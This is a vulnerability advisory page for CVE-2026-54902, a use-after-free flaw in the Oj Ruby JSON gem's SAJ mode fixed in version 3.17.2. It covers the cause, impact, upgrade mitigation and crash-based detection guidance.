CVE-2026-54902
Received Received - Intake

BaseFortify

Vulnerability report for CVE-2026-54902, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: GitHub, Inc.

Description

Oj (Optimized JSON) is a JSON parser and Object marshaller packaged as a Ruby gem. Prior to version 3.17.2, is vulnerable to Use-After-Free when in SAJ mode. The Oj::Parser does not protect cached object keys (β‰₯ 35 bytes) from garbage collection, and a Ruby callback that triggers GC inside hash_end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content). This issue has been fixed in version 3.17.2.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-07-01
Last Modified
2026-07-01
Generated
2026-07-01
AI Q&A
2026-07-01
EPSS Evaluated
N/A
NVD

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
ohler55 oj to 3.17.2 (exc)

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-416 The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory "belongs" to the code that operates on the new pointer.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Mitigation Strategies

The immediate mitigation step is to upgrade the Oj gem to version 3.17.2 or later, where this use-after-free vulnerability has been fixed.

Avoid using vulnerable versions of the Oj gem in SAJ mode with long object keys until the upgrade is applied.

Executive Summary

CVE-2026-54902 is a use-after-free vulnerability in the Oj Ruby gem, which is a JSON parser and object marshaller. This vulnerability occurs in versions before 3.17.2 when using the SAJ (Streaming API for JSON) mode. Specifically, when parsing JSON objects with keys that are 35 bytes or longer, the parser stores these keys as heap-allocated Ruby strings. During parsing, a Ruby callback named hash_end can trigger garbage collection, which may reclaim the memory of these key strings while the C parser still holds pointers to them. Accessing these freed strings causes a segmentation fault, potentially allowing an attacker to control the freed memory content.

Impact Analysis

This vulnerability can cause the Oj parser to crash with a segmentation fault when processing specially crafted JSON input. The crash is due to accessing memory that has already been freed, which can lead to denial of service in applications relying on the Oj gem for JSON parsing. Additionally, the presence of a canary pattern in the crash indicates that an attacker might be able to influence the freed memory content, potentially leading to further exploitation or arbitrary code execution.

Detection Guidance

This vulnerability manifests as a segmentation fault (crash) in the Oj gem when parsing JSON in SAJ mode with long object keys (35 bytes or more). Detection can involve monitoring for crashes or segfaults in applications using vulnerable versions of the Oj gem prior to 3.17.2.

Specifically, look for crash logs or core dumps showing an RIP address pointing to 0x4242, which is a canary pattern indicating use-after-free memory corruption.

Since the issue occurs during JSON parsing in SAJ mode, you can test by running code that parses JSON with long keys using the vulnerable Oj version and observe if a segmentation fault occurs.

No explicit detection commands are provided in the resources.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-54902. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart